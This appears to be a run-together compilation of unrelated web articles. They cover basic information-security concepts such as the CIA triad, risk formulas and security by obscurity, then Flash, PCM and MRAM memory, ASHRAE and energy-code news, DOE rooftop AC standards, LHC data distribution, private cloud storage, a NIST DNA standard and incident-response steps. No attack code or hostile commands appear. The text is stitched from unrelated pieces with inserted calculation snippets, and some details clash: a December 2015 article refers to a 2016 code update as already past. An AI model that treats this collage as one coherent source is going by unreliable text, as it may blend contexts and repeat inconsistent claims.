It's a good practice to think of information security attacks and defenses in terms of the CIA triad. Consider some common techniques used by attackers — sniffing traffic, reformatting hard drives, and modifying system files. Sniffing traffic is an attack on confidentiality because it's based on seeing that which is not supposed to be seen. An attacker who reformats a victim's hard drive has attacked the availability of their system. Finally, someone writing modified system files has compromised the integrity of that system. Thinking in these terms can go a long way toward helping you understand various offensive and defensive techniques.

Next I'd like to go over some extremely crucial industry terms. These can get a bit academic, but I'm going to do my best to boil them down to their basics.

A vulnerability is a weakness in a system. This one is pretty straightforward because vulnerabilities are commonly labeled as such in advisories and even in the media. Examples include the LSASS issue that let attackers take over systems. When you apply a security patch to a system, you're doing so to address a vulnerability.

A threat is an event, natural or man-made, that can cause damage to your system. Threats include people trying to break into your network to steal information, fires, tornados, floods, social engineering, malicious employees, etc. Anything that can cause damage to your systems is basically a threat to those systems. Also remember that a threat is usually rated as a probability, or chance, of that threat coming to bear. An example would be the threat of exploit code being used against a particular vulnerability. If there is no known exploit code in the wild, the threat is fairly low. But the second working exploit code hits the major mailing lists, your threat (chance) rises significantly.

Risk is perhaps the most important of all these definitions, since the main mission of information security officers is to manage it. The simplest explanation I've heard is that risk is the chance of something bad happening. That's a bit too simple, though, and I think the best way to look at these terms is with a couple of formulas:

Risk = Threat x Vulnerability

Multiplication is used here for a very specific reason — any time one of the two sides reaches zero, the result becomes zero. In other words, there will be no risk any time there is no threat or no vulnerability. As an example, if you are completely vulnerable to xyz issue on your Linux server, but there is no way to exploit it in existence, then your risk from that is nil.
Likewise, if there are tons of ways of exploiting the problem, but you already patched (and are therefore not vulnerable), you again have no risk whatsoever. A more involved formula adds the impact, or cost, to the equation (literally):

Risk = Threat x Vulnerability x Cost

What this does is allow a decision maker to attach quantitative meaning to the problem (a brief worked example follows a little later). It's not always an exact science, but if you know that someone stealing your business's most precious intellectual property would cost you $4 billion, then that's good information to have when considering whether or not to address the issue. That last part is important. The entire purpose of assigning a value to risk is so that managers can make the decisions on what to fix and what not to. If there is a risk associated with hosting certain data on a public FTP server, but that risk isn't serious enough to offset the benefit, then it's good business to go ahead and keep it out there. That's the whole trick — information security managers have to know enough about the threats and vulnerabilities to be able to make sound business decisions about how to evolve the IT infrastructure. This is Risk Management, and it's the entire business justification for information security.

Policy — A policy is a high level statement from management saying what is and is not allowed in the organization. A policy will say, for example, that you can't read personal email at work, or that you can't do online banking, etc. A policy should be broad enough to encompass the entire organization and should have the endorsement of those in charge.

Standard — A standard dictates what will be used to carry out the policy. As an example, if the policy says all internal users will use a single, corporate email client, the standard may say that the client will be Outlook 2000, etc.

Procedure — A procedure is a description of how exactly to go about doing a certain thing. It's usually laid out in a series of steps, i.e. 1) Download the following package, 2) Install the package using Add/Remove Programs, 3) Restart the machine, etc.

A good way to think of standards and procedures is to imagine standards as being what to do or use, and procedures as how to actually do it.

In this section I'd like to collect a series of important ideas I have about information security. Many of these aren't rules, per se, and are clearly opinion. As such, you're not likely to learn them in a class. Hopefully, though, a decent number of those in the field will agree with most of them.

The goal of Information Security is to make the organization's primary mission successful

Much hardship arises when security professionals lose sight of this key concept. Security isn't there because it's cool. It's there to help the organization do what it does. If that mission is making money, then the main mission of the security group — at its highest level — is to make that company money. To put it another way, the reason the security group is even there in the first place is to keep the organization from losing money. This isn't a "leet" way to look at things for those who are into the novelty of being in infosec, but it's a mentality that one needs to have to make it in the industry long-term. This is becoming increasingly the case as companies are starting to put a premium on the professionals who see security as a business function rather than a purely technical exercise.
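Returning briefly to the risk formulas above with the promised worked example (the numbers are entirely hypothetical and only meant to show the mechanics): suppose the chance of working exploit code appearing for a given flaw this year is estimated at 25%, the system is fully vulnerable to it, and a successful attack would cost roughly $400,000 in downtime and recovery. Then:

Risk ≈ 0.25 x 1.0 x $400,000 = $100,000 per year

That $100,000 figure can be weighed directly against the cost of patching, adding compensating controls, or simply accepting the risk.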
Current IT infrastructure makes cracking trivial

While many of the most skilled attackers can (and have) come up with some ingenious ways to leverage vulnerabilities in systems, the ability to do what we see every day in the security world is fundamentally based on horribly flawed architecture. Memory management, programming languages, and overall security design — none of these things we use today were designed with security in mind. They were designed by academics for academics. To use an analogy, I think we are building skyscrapers with balsa wood and guano. Crackers repeatedly tear into us at will and we can do nothing but patch and pray. Why? Because we're trying to build hundreds of feet into the air using shoddy materials. Balsa wood and guano make excellent huts — huts that stand up to a casual rain storm and a bump or two. But they don't do well against tornados, earthquakes, or especially hooligans with torches. For that we need steel. Today we don't have any. Today we continue to build using the same old materials. The same memory management issues that allow buffer overflows to run rampant, the same programming language issues that make it easier to write dangerous code than safe code, and so on. Until we have new materials to build on we'll always remain behind the curve. It's just too easy to light wood on fire or smash a hole in it.

So, all analogies aside, I think within the next decade or so we'll see the introduction of new system architecture models — models that are highly restrictive and run using a "default closed" paradigm. New programming languages, new IDEs, new compilers, new memory management techniques — all designed from the ground up to be secure and robust. The upshot of all of this is that I think that within that time period we'll see systems that can be exposed to the world and stand on their own for years with little chance of compromise. Successful attacks will still happen, of course, but they'll be extremely rare compared to today. Security problems will never go away, we all know that, but they'll return to being human/design/configuration issues rather than issues with gaping technological flaws.

Security by obscurity is bad, but security with obscurity isn't

I've been in many debates online over the years about the concept of Security by Obscurity. Basically, there's a popular belief out there that if any facet of your defense relies on secrecy, then it's fundamentally flawed. That's simply not the case. The confusion is based on the fact that people have heard security by obscurity is bad, and most don't understand what the term actually means. As a result, they make the horrible assumption that it means relying on obscurity — even as an additional layer to already good security — is bad. This is unfortunate. What security by obscurity actually describes is a system where secrecy is the only security. It comes from the cryptography world, where poor encryption systems are often implemented in such a way that the security of the system depends on the secrecy of the algorithm rather than that of the key. That's bad — hence the reason security by obscurity is known as a no-no.

What many people don't realize is that adding obscurity to security that's already solid is not a bad thing. A decent example of this is the Portknocking project. This interesting tool allows one to "hide" daemons that are available on the Internet, for example. The software watches firewall logs for specific connection sequences that come from trusted clients.
When the tool sees the specific knock on the firewall, it opens the port. The key here is that it doesn't just give you a shell — that would be security by obscurity. All it does at that point is give you a regular SSH prompt, as if the previous step wasn't even involved. It's an added layer, in other words, not the only layer.

Security is a process rather than a destination

This is a pretty common one, but it bears repeating. You never get there. There's no such thing. It's something you strive for and work towards. The sooner one learns that the better.

Complexity is the enemy of security

You may call me a weirdo, but I think the entire concept of simplicity is a beautiful thing. This applies to web design, programming, life organization, and yes — security. It's quite logical that complexity would hinder security, because one's ability to defend a system rests heavily on one's understanding of it. Complexity makes things more difficult to understand. Enough said.

My hope is that this short collection of ideas about information security will be of use to someone. If you have any questions or comments feel free to email me at firstname.lastname@example.org. I'm sure I've left out a ton of stuff that should have gone into this, and I'd appreciate any scolding along those lines.
Article by Ken Lee

Flash to the Future – The Next Generation of Non-Volatile Memory

Quickly, name a gadget that didn't even exist in the year 2000 but has since transformed our culture and the way we live today. 99% of you probably answered with MP3 player, tablet computer, GPS, e-Reader or smart phone. What do all of these devices have in common? For one thing, they are all super portable, and that feature is due to the unbridled success of Flash memory. The development and maturation of NAND Flash as an affordable, non-volatile, solid-state data storage solution has helped usher in an era of mobile technology. It has allowed us to invent gadgets that simply would not have worked if built around spinning platter drives. However, after a decade of revolutionizing the technology industry, Flash is reaching its limits for further development.

In order to increase Flash's maximum capacity, manufacturers have been shrinking the distance between transistors on flash chips over the years. In 2000, Flash was manufactured using a 180-nanometer process. Today, modern NAND Flash cells are for the most part manufactured using a 32nm process, with some bleeding-edge manufacturers moving to a 24nm process. The problem is that as Flash continues to shrink it becomes less and less reliable. As of April 2011, the theoretical minimum Flash cell size is 19nm. Beyond that point, the stability of Flash becomes highly suspect. As we approach the limit of Flash technology, it is prudent to look towards the future and consider a couple of promising non-volatile, solid-state storage technologies that may succeed Flash memory in our mobile devices.

Like Flash, Phase-change memory (aka PRAM or PCM) is non-volatile, solid-state computer memory, meaning that it retains information when powered off and has no moving parts. Unlike Flash, which works by changing the electronic charge stored within gates to set a bit as a 1 or 0, PCM uses an electric current to produce heat which switches a chalcogenide glass between crystalline and amorphous states to set a bit as a 1 or 0. PCM has several significant advantages over Flash:
- PCM can effectively write data 30x faster. The memory element can change the state of a single bit from a 1 to a 0. In Flash, if a bit is set to 0, the only way it can be changed to a 1 is by erasing an entire block of bits.
- PCM can be scaled to far smaller geometries than Flash without any loss of reliability.
- PCM is more durable than Flash. Flash cells degrade quickly because the burst of voltage across the cell causes degradation. Once cells begin degrading, they leak electric charge, causing corruption and loss of data. Flash memory is rated for about 5,000 writes per sector, and most devices employ wear leveling to make them stable up to 1 million write cycles. PCM also degrades with use, due to thermal expansion and metal migration, but at a much slower rate. Theoretically, PCM should endure up to 100 million write cycles.
- PCM is suitable for use in more environments than Flash. Because Flash relies on trapped electrons to store information, it is susceptible to data corruption due to exposure to radiation. PCM exhibits a higher resistance to radiation and therefore can be used in space and military applications.

Magnetoresistive RAM (aka MRAM) is another non-volatile, solid-state technology that has been in development since the mid 1990s. MRAM stores data using magnetic charge as opposed to electrical charge.
MRAM is composed of pairs of minuscule ferromagnetic plates which make up the memory cells. Each cell consists of two magnetic layers separated by an insulating layer. Each cell can be manipulated by an induced magnetic field, which sets the polarity of the magnetic layers in a parallel orientation or in an anti-parallel orientation. The different orientations determine whether the bit is set to a 1 or a 0. MRAM has many significant advantages over Flash and PCM:
- MRAM can be read and written to faster, and can be done on a much smaller scale. Like PCM, single bits can be changed from 1 to 0 without having to erase an entire block.
- MRAM degrades substantially slower than either Flash or PCM.
- MRAM could replace all memory in the future, making it a universal storage technology. It should offer speeds close to that of SRAM, with densities approaching that of DRAM, while being able to store information when power is removed, like Flash or EEPROM.
- Like PCM, MRAM also exhibits a higher resistance to radiation and therefore can be used in space and military applications that Flash is not suited for.

It should be noted that we can only speculate on when manufacturers will have to stop using Flash as the primary storage media in their products. Consider that in 2002, many experts assumed that Flash cells would not be stable when scaled past 45nm and predicted that Flash technology would need to be replaced by 2010. We know now that those predictions proved to be false. Many experts today believe that technological breakthroughs, like incorporating graphene, will allow the technology to be scaled down to 10nm without loss of stability. If this is true, Flash may still be the dominant memory in mobile devices for many years to come. Even though emerging technologies like PCM and MRAM are vastly superior to Flash in many ways, they are much more expensive to manufacture. As long as Flash remains a viable storage medium, there are too few incentives, and production costs are too high, for manufacturers to rush devices that use next-generation memory into the market.

Ken Lee is a product manager at Kanguru Solutions specializing in data storage and duplication equipment.

Cross-posted from Kanguru Blog – Technology on the Move!
ASHRAE 90.1 is a US standard that provides minimum requirements for energy-efficient design of buildings, except low-rise residential buildings. The original standard, ASHRAE 90, was published in 1975, and there have been multiple editions since. In 1999, the ASHRAE Board of Directors voted to place the standard on continuous maintenance, based on rapid changes in energy technology and energy prices; this allows it to be updated multiple times in a year. The standard was renamed ASHRAE 90.1 in 2001 and has since been updated in 2004, 2007, 2010, and 2013 to reflect newer and more efficient technologies. (Source: Wikipedia)

ASHRAE Journal | Year: 2014
Steven Taylor highlights some of the essential points for designing and controlling waterside economizers. To maximize performance, the economizer must be integrated with the chillers, meaning the economizer has to be able to reduce the load on the chillers even if it cannot handle the entire load. The same cooling towers and condenser water pumps should be used to serve both the economizer heat exchanger and the chiller condensers. While cooling tower capacity is not affected by the economizer, it may be necessary to reduce the design approach temperature to meet Standard 90.1's waterside economizer requirements, particularly for plants with high loads in cold weather. Cooling towers should be selected so that as many tower cells as possible can be enabled when the economizer is enabled, to maximize efficiency and capacity while maintaining the minimum flow rates required by the tower manufacturer to prevent scaling. The heat exchanger should be a plate-and-frame type, selected for an approach of about 3°F above the entering condenser water temperature. Source

ASHRAE Transactions | Year: 2012
Analytical evidence and experimental results suggest that return air temperature control limits the effectiveness and efficiency of data center cooling. Return air temperature control rarely, and often only coincidentally, enables a close match of air provisioning relative to IT equipment consumption. Other methods that divorce flow control from temperature control offer much better opportunities to tune cooling performance, either manually or automatically, producing improvements in operational energy and capital usage. Under-floor static pressure control is one such method. This paper presents evidence suggesting that static pressure control is a viable and often superior alternative to return air temperature control. © 2012 ASHRAE. Source

ASHRAE Journal | Year: 2014
Experts shared their views on the lessons learned from the ASHRAE headquarters (HQ) renovation project. ASHRAE did its first major renovation in 1990 by gutting the interior, updating the mechanical systems, installing a new insulated glass curtain wall system, and abating asbestos materials on the interior. The reason for having three mechanical systems was to achieve the goal of creating a "Living Lab" for ongoing research by the Society and its members. More than 1,300 points were monitored and stored on the systems and spaces in this building, and the stored and real-time data were made available to members around the world via the Internet. ASHRAE expected to learn more about the long-term operation, maintenance, and performance of buildings with the various types of systems used throughout this project.
Source

News Article | December 23, 2015
The Paris climate talks gave strong impetus to the world's determination to curtail climate pollution through policies that create jobs and economic growth while simultaneously cutting emissions. While they may be a lower-profile solution, improved building codes are a cornerstone of a successful climate policy. One reason for the paucity of discussion of codes is that climate policy is made at the national level, while in the United States and many other countries, energy codes are adopted and enforced primarily at the state or even local level. Nevertheless, new energy codes have the potential to save 160 MMTCE (million metric tons of carbon equivalent) of climate pollution in America by 2030, some 3 percent of the entire nation's emissions, merely by adopting model codes that already exist. Adopting the 2015 version of the International Energy Conservation Code (IECC) would result in emissions savings with an economic benefit of a quarter of a trillion dollars over the next 15 years. These savings compound over time: by 2050 the savings will be about double the savings in 2030, simply because the codes apply to more and more buildings constructed since 2015. Savings will also get much larger for two reasons explored below.

NRDC actively works with coalitions of businesses and other nonprofits to raise the bar on energy codes. Figure 1 shows the progress of codes.

Figure 1. Progress of model codes in the United States

The IECC code applies most commonly to residential buildings, while the ASHRAE standard is exclusively for commercial buildings. Both standards are voluntary models, but all U.S. states are required by law to adopt or consider them, and some foreign jurisdictions adopt them, or modify and adopt them, as well. Figure 1 demonstrates the accelerating progress made since the 2004-06 codes, which were hardly changed compared to 1975. From 2006 until 2012, coalitions in support of stronger codes succeeded in getting a reduction in energy use of some 30 percent.

During the debate over the code for 2015, NRDC believed that there was still potential for more savings. By offering home builders something they really wanted (flexibility and a reduced administrative burden) in return for increased savings, NRDC successfully helped to create an alternative path for homebuilders to comply with the code. The 2015 IECC contains a new tradeoff method that allows a home to meet an Energy Rating Index (ERI), the most prevalent of which is the HERS index. Using the ERI path to comply with the 2015 code requires savings of at least 45 percent compared to 2006, but allows for increased flexibility in how the savings are achieved. The ERI is like a miles-per-gallon rating for homes, in which a score of 100 means the home meets the 2006 IECC code and a score of zero means the home has no net energy consumption. Thus a score of 60 means an energy savings of 40 percent. Inclusion of the ERI is valuable to consumers: it tells the buyer how efficient the home is and how much money they should expect to spend on utility costs. The HERS score makes efficiency visible by allowing comparisons between homes. As about one-third of all new homes sold in 2014 were rated with a HERS score, there is competition between builders for a lower score.
Thus, even though the tightest codes result in the average home having a HERS score of about 69, and even though most jurisdictions enforce the weaker 2009 code, the average HERS score last year was 63. The existence of HERS scores on a wide basis is causing competition among builders over how much better than code their efficiency is.

This year, the 2015 code has been adopted in several states, including Vermont and Maryland, and is in the process of adoption in several others. Even in states that did not cleanly adopt the model 2015 IECC building code, we still saw some progress. For example, in Texas, the largest new-homes market in the country, the legislature passed a law that adopts the same prescriptive checklist of required insulation levels, etc., as in the 2015 IECC, as well as the optional ERI method. While the Texas code contains ERI scores that are higher (and therefore weaker) than the 2015 model code, either method of compliance is a substantial improvement over the 2009 code.

Most studies of efficiency potential answer the question of how much we would save if we used technologies current at the time of the analysis, but do not assume any improvement in those technologies. Yet in areas where we have tried consistently to improve efficiency through up-to-date policies, we have seen rates of improvement in energy consumption of 6 percent per year or more. The study whose results I cited above distinguishes itself by modeling an improvement of 5 percent for every code cycle. Code cycles occur every three years, so this is a very modest assumption. As noted above, we have been able to achieve savings of about 15 percent every code cycle since 2006. An improvement rate of 6 percent per year, which we have achieved in the California energy code since 1975, would yield roughly a 20 percent improvement per triennial cycle. This would lead to a much larger savings projection, especially for 2050. Other areas where we have been able to achieve continual improvement rates of 6 percent annually are noted in my book, "Invisible Energy: Strategies to Rescue the Economy and Save the Planet."

In advance of the next code cycle beginning in 2018, NRDC is working with a broad variety of stakeholders both to tighten efficiency requirements by about 5 to 10 percent and to set minimum requirements for savings from efficiency alone, before accounting for solar generation. Currently, it is unclear whether the version of the ERI score used in the IECC counts energy savings from solar. NRDC supports a middle-ground proposal that will allow some solar tradeoff but also guarantee a minimum level of efficiency. While investing in energy efficiency is ultimately cheaper for the consumer, there are attractive financing options and tax credits that help reduce the upfront costs to the builder of solar generation equipment and thus create a non-level playing field. NRDC fully supports efforts to increase solar power, but solar must be coupled with appropriate levels of efficiency to be most effective. This type of limited tradeoff for solar power is already being used in Vermont and Massachusetts.

So far we have talked about codes in most states, which rely on national models. But California maintains its own code, which is usually more advanced than those of other states. This year the California Energy Commission adopted code upgrades that will save some 25 percent of energy use compared to the previous code, following a 2016 update that itself saves some 25 percent.
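The ERI arithmetic and the compounding of code-cycle improvements described above are easy to check. Here is a small illustrative sketch; the function names are ours, not part of the IECC or HERS programs.

    # Energy Rating Index (ERI/HERS) scale: 100 = meets the 2006 IECC, 0 = net zero,
    # so percent savings relative to the 2006 baseline is simply 100 - score.

    def savings_vs_2006(eri_score):
        return 100 - eri_score

    print(savings_vs_2006(60))   # 40 -> a score of 60 means 40% savings
    print(savings_vs_2006(55))   # 45 -> roughly the 2015 IECC ERI compliance path
    print(savings_vs_2006(63))   # 37 -> last year's average HERS-rated new home

    # Compounding improvements across triennial code cycles, e.g. the study's
    # assumption of 5% per cycle carried over five cycles (2015 to 2030):
    def cumulative_savings(rate_per_cycle, cycles):
        return 1 - (1 - rate_per_cycle) ** cycles

    print(round(cumulative_savings(0.05, 5), 3))   # 0.226 -> about 23% below the start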
We are working with the Commission and with stakeholders to ensure that the 2019 California code is consistent with the state's goal of zero-net-energy homes by 2020 (meaning the home's total annual energy use is roughly equal to the amount of renewable energy created onsite). We are also working collaboratively with builders to try to harmonize California's HERS system with the national system. Currently, the California system is minimally used: builders and retrofitters find it too bureaucratic. Its outputs do not agree with those of the national system, so that a HERS 80 home in California may use less energy than a HERS 65 home in Nevada. While some advanced features of the California system should be retained, and perhaps extended to the national system, in other areas the two systems disagree without any good reason. This is a barrier to using HERS ratings for consumer transparency in California, a barrier we hope to eliminate in 2016.

Energy codes are a powerful tool for cutting emissions and lifting the economy. NRDC plans to begin the next three-year process of continually improving energy codes at the national and state levels and anticipates strong success in 2016 and beyond. We encourage states and cities to adopt the most current codes to maximize emissions savings and job creation.

News Article | December 22, 2015
More efficient furnaces and rooftop AC units could save 15 quads of energy by 2045. The U.S. Department of Energy announced an agreement for new energy efficiency standards for commercial furnaces and rooftop air conditioners. The federal government called the standards the largest in U.S. history for the amount of energy that will be saved: nearly 15 quadrillion BTU over the next 30 years. "They will save about the same amount of energy as all the coal burned in the U.S. to generate electricity in a year," according to Rhea Suh, president of the Natural Resources Defense Council. "These are very, very promising days in the global fight to slow, stop and reverse climate change."

Over the next three decades, the increased efficiency will cut 885 million metric tons of carbon dioxide, bringing the DOE more than two-thirds of the way to its goal of reducing carbon pollution by 3 billion metric tons. Rooftop units cool about half the total commercial floor space in the U.S., according to the DOE. A typical owner would save about $5,000 to $10,000 over the lifetime of the equipment, but the actual savings are higher for an entire AC system, as a typical big-box store may have more than 20 units. Starting in 2018, rooftop AC will have to be about 13 percent more efficient than it is today. By 2023, it will have to be 25 percent to 30 percent more efficient than current models. Commercial furnaces will have to have thermal efficiencies of at least 81 percent for gas furnaces and 82 percent for oil furnaces by 2023.

Although much of the cleantech industry's attention was focused on the spending bill and the Investment Tax Credit extension for wind and solar last week, energy efficiency advocates were heralding this announcement. "DOE is ringing in the holiday season with truly monumental energy and economic savings," Andrew deLaski, executive director of the Appliance Standards Awareness Project, said in a statement. With efficiency advocates and industry stakeholders at the negotiating table, the DOE also made changes to how the efficiency of rooftop units would be calculated.
The standard will be based on the integrated energy efficiency ratio (IEER) metric, which captures the AC's energy use over a range of operating conditions, according to NRDC. The test procedure will also take into account total fan use, which can be a considerable chunk of an air conditioner's total energy use. The push for standards started five years ago with DOE's Rooftop Unit Challenge, which called on manufacturers to deliver more efficient systems (up to 50 percent more efficient than current ASHRAE 90.1 standards) at competitive prices. In 2012, Daikin's Rebel rooftop unit system was the first to meet the challenge. A year later, Carrier met the challenge. Now, five companies have units that meet the specifications. The standards will be finalized late in 2016, and little opposition is expected.

Greentech Media (GTM) produces industry-leading news, research, and conferences in the business-to-business greentech market. Our coverage areas include solar, smart grid, energy efficiency, wind, and other non-incumbent energy markets. For more information, visit greentechmedia.com.
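For readers unfamiliar with the IEER metric mentioned above: it is a weighted average of efficiency at four part-load points. The sketch below uses the weighting commonly cited from AHRI Standard 340/360; treat the weights and the sample values as illustrative rather than authoritative.

    # IEER as a weighted average of EER at four load points (100%, 75%, 50%, 25%).
    # Weights follow the commonly cited AHRI 340/360 formulation; values are examples.

    def ieer(eer_100, eer_75, eer_50, eer_25):
        return 0.020 * eer_100 + 0.617 * eer_75 + 0.238 * eer_50 + 0.125 * eer_25

    # A hypothetical rooftop unit that is more efficient at part load:
    print(round(ieer(11.0, 13.5, 15.0, 16.0), 1))   # -> 14.1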
In the northwest suburbs of Geneva on the Franco-Swiss border sits CERN (the European Organization for Nuclear Research), the world's largest particle physics laboratory. CERN is home to the most ambitious particle physics project of our time, the search for the Higgs boson, a hypothetical subatomic particle that is thought to give mass to all other particles. This elusive speck is so treasured that some have dubbed it the God Particle.

In order to coax the Higgs boson out from hiding, detectors at the Large Hadron Collider (LHC), CERN's giant particle accelerator, are smashing together beams of high-energy protons. The most promising collisions are converted into electronic signals and sent to a computer farm where they undergo a digital reconstruction. But this is only the beginning of the data's long journey. An article in Nature looks at the path the data must travel in order to reach member research sites, where the analysis can commence. Here's a breakdown of the process:

Even after rejecting 199,999 of every 200,000 collisions, the detector churns out 19 gigabytes of data in the first minute. In total, ATLAS and the three other main detectors at the LHC produced 13 petabytes (13 × 10^15 bytes) of data in 2010, which would fill a stack of CDs around 14 kilometres high. That rate outstrips any other scientific effort going on today, even in data-rich fields such as genomics and climate science (see Nature 455, 16–21; 2008). And the analyses are more complex too. Particle physicists must study millions of collisions at once to find the signals buried in them: information on dark matter, extra dimensions and new particles that could plug holes in current models of the Universe. Their primary quarry is the Higgs boson, a particle thought to have a central role in determining the mass of all other known particles.

The data get sent to the Worldwide LHC Computing Grid, an extensive network of linked computers comprising approximately 200,000 processing cores and 150 petabytes of disk space. From there the data are distributed to 34 countries through leased data lines at a rate of 5 gigabytes per second. All the researchers need a copy of the data, but if they all logged into the system at the same time, it would overload and shut down. So instead, the grid automatically routes copies of the data to the participating research institutions. The datasets are split up so that different research groups each get relevant pieces. When the information reaches its destination, the project partners access it and run their analyses. As more and more data are collected, a picture begins to form. With each petabyte of data that flows through the grid, the scientists could be one step closer to finding proof of the God Particle, and achieving a deeper understanding of the big bang.
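A back-of-the-envelope sketch of what those figures imply (our own arithmetic on the numbers quoted above, not from the Nature article):

    # Rough arithmetic on the LHC data figures quoted above.

    raw_2010 = 13e15           # bytes produced by the main detectors in 2010
    grid_rate = 5e9            # bytes per second distributed over leased lines

    seconds = raw_2010 / grid_rate
    print(f"~{seconds / 86400:.0f} days to push one year of data at 5 GB/s")  # ~30 days

    # Data reduction at the detector: only 1 in 200,000 collisions is kept.
    kept_fraction = 1 / 200_000
    print(f"kept fraction of collisions: {kept_fraction:.6%}")   # 0.000500%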
But a storage cloud doesn't have to be public. A wide range of private cloud storage products have been introduced by vendors, including name-brand companies such as EMC, with its Atmos line, and smaller players like ParaScale and Bycast. Other vendors are slapping the "cloud" label on existing product lines. Given the amorphous definitions surrounding all things cloud, that label may or may not be accurate. What's more important than semantics, however, is finding the right architecture to suit your storage needs.

A prototypical cloud storage system is made up of a number of x86 servers, each with its own storage, most commonly using four to 16 SATA drives. Users and their applications access the system through standard file access protocols like CIFS and NFS, or via object storage and retrieval protocols like SOAP and REST. The storage nodes in a private cloud are linked together with a layer of smart software, which performs several functions. First, it maintains a global name space that allows all the storage in the cluster to be accessed as a single entity, so that administrators can add storage capacity on the back end without having to tell applications at the front end how to reach it. The software also handles drive failures and keeps data available to applications and end users. A private cloud storage infrastructure should also be able to scale from hundreds of terabytes to multiple petabytes. That level of scalability is achieved not with a forklift upgrade, but simply by adding more servers as they're needed.

This architecture provides two major benefits. First, storage administrators can configure and provision new storage nodes quickly and inexpensively. Second, administrators can add capacity only as demand requires, instead of purchasing additional disk space to meet anticipated future growth and then having that capacity sit idle in the present.

However, there are also trade-offs. For one thing, cloud storage is best suited to unstructured data, such as medical images, engineering drawings, and Office documents. For another, because each x86 server isn't as reliable as a high-end enterprise disk array, a private cloud must store copies of the data on multiple nodes. This requires more raw disk space than an enterprise disk array using a RAID-5 or 6 system. For example, if you set a policy for your private cloud to keep three copies of a 60-GB file for data protection, it would require 180 GB of disk, whereas a 6+2 RAID-6 system would need just 80 GB.

Beyond Low Cost

Several other vendors include location-aware policy engines that copy data to nodes in specific geographical locations. Data Direct Networks' Web Object Store, Bycast's StorageGrid, and EMC's Atmos systems can specify that two copies of each object in a folder should be stored in New York and Los Angeles, and that copies also should be stored in two other locations. This not only protects data from data center failures but can also put objects on storage clusters close to the users who need them. Bycast's policy engine takes this notion one step further by including elements, such as storage tiering, that can migrate objects from more-expensive to less-expensive disk, and even to and from tape.

Organizations planning to offer private cloud storage services to internal departments may want to consider multitenant features that allow storage to be partitioned among different groups.
For example, IT could carve out one section of the private cloud for HR and another for marketing, and then charge those departments based on usage. This means having delegated administration models and/or virtual servers that restrict each group's access and visibility to only their own data and the resources assigned to them. A multitenant storage system should also include accounting features that collect usage data, such as peak utilization, that will help IT in determining chargebacks.
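The replication-versus-RAID overhead comparison made earlier is easy to generalize. Here is a small sketch (the function names are ours) for comparing the raw capacity needed under N-copy replication and under a RAID-6-style layout.

    # Raw capacity needed to protect `data_gb` of user data.

    def replication_raw(data_gb, copies=3):
        """N-copy replication, as used by many private cloud storage clusters."""
        return data_gb * copies

    def raid6_raw(data_gb, data_disks=6, parity_disks=2):
        """RAID-6 style layout: overhead is (data + parity) / data."""
        return data_gb * (data_disks + parity_disks) / data_disks

    print(replication_raw(60))    # 180 GB for three copies of a 60 GB file
    print(raid6_raw(60))          # 80 GB on a 6+2 RAID-6 set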
Thanks to the polymerase chain reaction (PCR), a method for making multiple copies of DNA fragments, even tiny bits of biological evidence (in the form of hair, tissue, bones, teeth, blood or other bodily fluids) from a crime scene can be used to isolate genetic material that eventually can identify a suspect or victim. A new Standard Reference Material from the National Institute of Standards and Technology (NIST), SRM 2372 (Human DNA Quantitation Standard), is available to help ensure the success of this identification process, known as DNA profiling.

One profiling method popular with forensic experts uses short tandem repeats (STRs, short identical sequences of DNA found in specific regions of a chromosome) to compare samples of DNA from a crime scene to DNA from a suspect or victim. Commercial PCR systems that amplify STRs work best if the amount of DNA fed into the system, measured in nanograms per microliter of solution, is within a narrow range. Too concentrated a solution overwhelms the detection apparatus; too diluted a solution yields poor results or none at all.

DNA quantitation, assessing the amount of DNA present in a crime scene sample, is the necessary precursor to making a suitable solution for profiling. A widely used method to achieve this is quantitative PCR (qPCR); however, current commercial qPCR kits may produce varying values for the DNA concentrations in the kit's reference samples, rendering these standards less reliable for assaying the quantity of extracted evidential DNA. SRM 2372 can be used by qPCR manufacturers to calibrate their systems in the factory so that measurements made with the kits in forensic laboratories are consistently accurate.

The SRM contains samples of human genomic DNA from three sources: an individual male, multiple female donors, and a mix of male and female donors. Each sample has been prepared to yield an optical density (OD) of 1.0 on a spectrophotometer when examined using a 260-nanometer wavelength of light. Scientists have determined that for a solution of double-stranded DNA, an OD of 1.0 at 260 nanometers corresponds to 50 micrograms of DNA per milliliter of solution. More information about SRM 2372, including purchase data, may be found at https://srmors.nist.gov/view_detail.cfm?srm=2372.
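The OD-to-concentration rule of thumb quoted above is simple to apply. The sketch below does the unit conversion; the variable names and the example dilution are ours.

    # dsDNA rule of thumb: OD 1.0 at 260 nm corresponds to about 50 micrograms/mL.
    # Note 1 microgram/mL == 1 nanogram/microliter, the unit typically used for STR kits.

    def dsdna_conc_ng_per_uL(od260, dilution_factor=1.0):
        return od260 * 50.0 * dilution_factor

    print(dsdna_conc_ng_per_uL(1.0))        # 50.0 ng/uL for an undiluted sample reading OD 1.0
    print(dsdna_conc_ng_per_uL(0.04, 10))   # 20.0 ng/uL for a 1:10 dilution reading OD 0.04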
Incident response: Concept and procedures

An incident is any event that has a significant effect on a system, whether that effect is good or bad. Society deals with incidents every day, and institutions such as the police, the military, corporations, municipalities, hospitals and fire brigades exist to respond to them. Computer and network systems likewise experience many kinds of incidents, and there are teams, procedures and backup systems whose job is to respond to them. Applying the right response to the right incident requires some knowledge of both the incidents themselves and the available responses. This article offers a short, practical overview of the most common incidents and their appropriate responses.

Preparing a response to an incident is best broken into a few steps. The steps matter: without following them, the correct response to a given incident cannot be delivered. As with any problem, whether in human health, a natural event or a computer or network incident, diagnosis comes first, and the diagnosis stage plays the most important role in both understanding what happened and acting on it. For a server or network incident, the first and most essential response is to report the occurrence to the team leader, so that the team leader is aware of the incident and it is formally escalated. If the incident involves data theft, the police will also need to be informed, but that is part of the team leader's responsibility.

Escalation and notification

Once a theft or leak of important data, or any security issue affecting a person, an organization or even a nation, has been identified, it is the team leader's duty to inform his or her senior or floor manager immediately. When doing so, the team leader must always record two times in the incident report: the time the incident came to his or her own attention, and the time of occurrence as reported by the subordinate who first observed it. Once the incident has been properly escalated, it is also the team leader's duty to notify the local police of the data leakage or theft. Two things should be reported to them: the time of occurrence as given by the first observer, and the importance of the data that has been leaked or stolen. The rest is handled by the police, who may seal the server or place a monitoring sensor on it to inspect every change made to it. Once the incident has been correctly identified and reported to the proper authority, the mitigation step begins.
Mitigation essentially means reducing the effect of the incident on everything else in the server or network environment. The loops and logs should be checked and the network gateways locked down to prevent intrusion into the system by external agents. This limits further data loss and may also make it easier for the police cyber crime department to track the lost or leaked data.

